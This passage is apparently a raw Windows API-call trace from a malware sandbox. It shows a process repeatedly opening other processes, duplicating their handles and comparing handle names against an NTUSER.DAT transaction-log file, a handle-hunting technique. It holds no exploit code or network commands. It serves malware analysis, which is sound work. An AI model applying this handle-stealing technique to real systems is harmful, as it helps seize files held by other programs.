hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.746] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.748] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.748] CloseHandle (hObject=0x670) returned 1 [0152.748] CloseHandle (hObject=0x680) returned 1 [0152.748] CloseHandle (hObject=0x62c) returned 1 [0152.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.748] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.749] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.750] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.750] CloseHandle (hObject=0x670) returned 1 [0152.750] CloseHandle (hObject=0x680) returned 1 [0152.750] CloseHandle (hObject=0x62c) returned 1 [0152.750] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.750] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.750] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.751] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.751] CloseHandle (hObject=0x670) returned 1 [0152.751] _wcsicmp (_Str1="\\.", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -64 [0152.751] CloseHandle (hObject=0x680) returned 1 [0152.751] CloseHandle (hObject=0x62c) returned 1 [0152.751] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.751] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.752] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.754] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.754] CloseHandle (hObject=0x670) returned 1 [0152.754] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.754] CloseHandle (hObject=0x680) returned 1 [0152.754] CloseHandle (hObject=0x62c) returned 1 [0152.754] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.754] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.755] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.755] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.755] CloseHandle (hObject=0x670) returned 1 [0152.756] _wcsicmp (_Str1="\\$ObjId", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -74 [0152.756] CloseHandle (hObject=0x680) returned 1 [0152.756] CloseHandle (hObject=0x62c) returned 1 [0152.756] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.756] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.756] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.757] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.757] CloseHandle (hObject=0x670) returned 1 [0152.757] CloseHandle (hObject=0x680) returned 1 [0152.757] CloseHandle (hObject=0x62c) returned 1 [0152.757] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.757] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.758] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.759] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.759] CloseHandle (hObject=0x670) returned 1 [0152.759] _wcsicmp (_Str1="\\tracking.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.759] CloseHandle (hObject=0x680) returned 1 [0152.759] CloseHandle (hObject=0x62c) returned 1 [0152.759] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.759] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.760] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.760] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.761] CloseHandle (hObject=0x670) returned 1 [0152.761] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.761] CloseHandle (hObject=0x680) returned 1 [0152.761] CloseHandle (hObject=0x62c) returned 1 [0152.761] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.761] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.762] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.762] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.762] CloseHandle (hObject=0x670) returned 1 [0152.762] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.762] CloseHandle (hObject=0x680) returned 1 [0152.762] CloseHandle (hObject=0x62c) returned 1 [0152.762] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.763] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.763] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.764] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.764] CloseHandle (hObject=0x670) returned 1 [0152.764] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.764] CloseHandle (hObject=0x680) returned 1 [0152.764] CloseHandle (hObject=0x62c) returned 1 [0152.764] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.764] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.765] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.767] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.767] CloseHandle (hObject=0x670) returned 1 [0152.767] CloseHandle (hObject=0x680) returned 1 [0152.767] CloseHandle (hObject=0x62c) returned 1 [0152.767] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.767] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.768] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.769] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.769] CloseHandle (hObject=0x670) returned 1 [0152.769] CloseHandle (hObject=0x680) returned 1 [0152.769] CloseHandle (hObject=0x62c) returned 1 [0152.769] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.769] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.770] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.772] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.772] CloseHandle (hObject=0x670) returned 1 [0152.772] CloseHandle (hObject=0x680) returned 1 [0152.772] CloseHandle (hObject=0x62c) returned 1 [0152.772] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.772] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.773] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.773] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.773] CloseHandle (hObject=0x670) returned 1 [0152.773] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.773] CloseHandle (hObject=0x680) returned 1 [0152.774] CloseHandle (hObject=0x62c) returned 1 [0152.774] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0152.774] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.774] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.775] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.775] CloseHandle (hObject=0x670) returned 1 [0152.775] CloseHandle (hObject=0x680) returned 1 [0152.775] CloseHandle (hObject=0x62c) returned 1 [0152.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.775] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.776] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.777] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.777] CloseHandle (hObject=0x670) returned 1 [0152.777] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.777] CloseHandle (hObject=0x680) returned 1 [0152.777] CloseHandle (hObject=0x62c) returned 1 [0152.777] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.777] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.778] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.778] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.778] CloseHandle (hObject=0x670) returned 1 [0152.778] CloseHandle (hObject=0x680) returned 1 [0152.778] CloseHandle (hObject=0x62c) returned 1 [0152.778] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.778] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.779] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.780] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.780] CloseHandle (hObject=0x670) returned 1 [0152.780] CloseHandle (hObject=0x680) returned 1 [0152.780] CloseHandle (hObject=0x62c) returned 1 [0152.780] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.780] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.781] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.781] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.781] CloseHandle (hObject=0x670) returned 1 [0152.781] CloseHandle (hObject=0x680) returned 1 [0152.781] CloseHandle (hObject=0x62c) returned 1 [0152.781] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.782] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.782] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.783] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.783] CloseHandle (hObject=0x670) returned 1 [0152.783] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.783] CloseHandle (hObject=0x680) returned 1 [0152.783] CloseHandle (hObject=0x62c) returned 1 [0152.783] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.783] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.783] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.784] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.785] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.785] CloseHandle (hObject=0x670) returned 1 [0152.785] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.785] CloseHandle (hObject=0x680) returned 1 [0152.785] CloseHandle (hObject=0x62c) returned 1 [0152.785] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.785] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.786] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.788] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.788] CloseHandle (hObject=0x670) returned 1 [0152.788] CloseHandle (hObject=0x680) returned 1 [0152.788] CloseHandle (hObject=0x62c) returned 1 [0152.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.788] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.789] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.790] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.790] CloseHandle (hObject=0x670) returned 1 [0152.790] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.790] CloseHandle (hObject=0x680) returned 1 [0152.790] CloseHandle (hObject=0x62c) returned 1 [0152.790] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.790] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.791] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.792] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.792] CloseHandle (hObject=0x670) returned 1 [0152.792] _wcsicmp (_Str1="\\Tasks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0152.792] CloseHandle (hObject=0x680) returned 1 [0152.792] CloseHandle (hObject=0x62c) returned 1 [0152.792] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.792] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.792] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.793] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.794] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.794] CloseHandle (hObject=0x670) returned 1 [0152.794] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.794] CloseHandle (hObject=0x680) returned 1 [0152.794] CloseHandle (hObject=0x62c) returned 1 [0152.794] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.794] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.795] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.796] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.796] CloseHandle (hObject=0x670) returned 1 [0152.796] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0152.796] CloseHandle (hObject=0x680) returned 1 [0152.796] CloseHandle (hObject=0x62c) returned 1 [0152.796] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.796] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.797] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.797] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.797] CloseHandle (hObject=0x670) returned 1 [0152.797] CloseHandle (hObject=0x680) returned 1 [0152.797] CloseHandle (hObject=0x62c) returned 1 [0152.797] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.798] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.798] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: 